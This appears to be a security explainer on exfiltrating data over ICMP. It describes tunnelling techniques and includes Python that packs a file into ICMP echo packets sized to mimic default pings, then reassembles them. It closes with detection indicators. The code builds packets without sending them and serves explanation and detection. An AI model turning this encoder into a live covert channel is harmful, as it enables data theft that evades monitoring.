Data Exfil using ICMP

ICMP (Internet Control Message Protocol) is a network-layer protocol used for diagnostics and control. Because echo requests are commonly allowed through firewalls, rarely proxied, and typically inspected less strictly than TCP/UDP, attackers sometimes abuse ICMP to tunnel and exfiltrate data. The payload of an echo request/reply (and of timestamp and information messages) is entirely sender-controlled, so a malicious actor can carry arbitrary bytes in it and send the packets to a remote listener under their control, which strips the headers and reassembles the data.

Common techniques for exfil

  • ICMP echo (type 8) / reply (type 0) tunneling: attackers place encoded (base64, hex) chunks of files inside ICMP payloads. The remote server collects and decodes them.

  • Custom ICMP types/codes: using uncommon ICMP types (timestamp or information requests rather than echo) or non-zero codes to slip past signatures that only look at echo traffic.

  • Chunking and reassembly: large payloads are split across many packets; tunnelling tools commonly reuse the identifier and sequence-number fields of the ICMP echo header to tag the session and order the chunks on the receiving side.

  • Encryption/obfuscation: XOR-ing or encrypting payloads so they look like random data. Base64 is common but is an encoding, not encryption: it inflates the data by a third and leaves a recognizable character set that detections can match.
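The full sender/receiver flow described above (chunk a file, wrap each chunk in an echo request tagged with a session id and sequence number, reassemble on the other side) as an added example that is not code from the original page or from any tool it describes. Packets are built as raw bytes and never put on the wire: sending would need a raw socket (root or CAP_NET_RAW) and a listener. The framing, header-in-seq-0 and a 56-byte default chunk (so every packet is the size of a stock Linux ping), is one layout assumed for illustration, not a standard.

```python
"""Encode a file into ICMP echo-request payloads and reassemble it on the receiving side.

Added example (not from the original page). Packets are built as bytes only.
Framing (assumed for illustration): identifier = session id, seq 0 = chunk count,
seq i (i >= 1) = chunk i-1, payload = raw chunk bytes (no base64 needed: echo
payloads may carry arbitrary bytes, and base64 only makes them easier to spot).
"""
import struct

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0
DEFAULT_CHUNK = 56  # Linux iputils ping sends a 56-byte payload by default


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over the ICMP header + payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Return an ICMP echo packet (8-byte header + payload) with a valid checksum."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def checksum_ok(packet: bytes) -> bool:
    """A valid packet sums to 0 when the checksum field is included."""
    return len(packet) >= 8 and icmp_checksum(packet) == 0


def parse_echo(packet: bytes):
    """Parse an ICMP echo packet into (type, code, ident, seq, payload); raise on bad checksum."""
    if not checksum_ok(packet):
        raise ValueError("short packet or bad ICMP checksum")
    icmp_type, code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return icmp_type, code, ident, seq, packet[8:]


def exfil_packets(data: bytes, session_id: int, chunk_size: int = DEFAULT_CHUNK) -> list:
    """Sender side: split `data` into chunks and wrap each in an echo request."""
    chunks = [data[i:i + chunk_size] for i in range(0, len(data), chunk_size)]
    # seq 0 announces how many chunks follow so the receiver can detect loss.
    pkts = [build_echo(ICMP_ECHO_REQUEST, session_id, 0, struct.pack("!I", len(chunks)))]
    for i, chunk in enumerate(chunks, start=1):
        pkts.append(build_echo(ICMP_ECHO_REQUEST, session_id, i, chunk))
    return pkts


def reassemble(packets: list, session_id: int) -> bytes:
    """Receiver side: collect chunks for `session_id` by sequence number.

    Tolerates out-of-order delivery and ignores packets from other sessions;
    raises if the session header or any chunk is missing.
    """
    chunks = {}
    expected = None
    for pkt in packets:
        icmp_type, _code, ident, seq, payload = parse_echo(pkt)
        if icmp_type != ICMP_ECHO_REQUEST or ident != session_id:
            continue
        if seq == 0:
            expected = struct.unpack("!I", payload[:4])[0]
        else:
            chunks[seq] = payload
    if expected is None:
        raise ValueError("session header (seq 0) never seen")
    missing = [i for i in range(1, expected + 1) if i not in chunks]
    if missing:
        raise ValueError("missing chunks: %r" % missing)
    return b"".join(chunks[i] for i in range(1, expected + 1))


if __name__ == "__main__":
    # Constructed sample "file"; in a real tunnel this would be read from disk.
    secret = b"constructed secret payload " * 5
    pkts = exfil_packets(secret, session_id=0x1234)
    print("%d packets, sizes %s" % (len(pkts), [len(p) for p in pkts]))
    assert reassemble(pkts, 0x1234) == secret
```

Every data packet here is exactly 64 bytes (8-byte header plus 56-byte chunk), the size of a default Linux ping, which is why a detection that keys on payload size alone misses this variant; the identifier/sequence fields, which normal pings also use, give the receiver ordering for free.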

IOAs (indicators of attack)

  • Persistent ICMP sessions to an external host not used for legitimate monitoring.

  • Unusually large ICMP payloads, or frequent ICMP whose payload size differs from the platform default (56 bytes for Linux iputils ping, 32 bytes for Windows ping).

  • ICMP payloads that contain high-entropy data, or that match base64/hex character sets instead of the fixed filler pattern normal ping tools send.

  • Bursts of ICMP from a host that are not accompanied by any other application traffic to the same destination (a legitimate ping usually precedes or sits alongside a connection rather than replacing it).
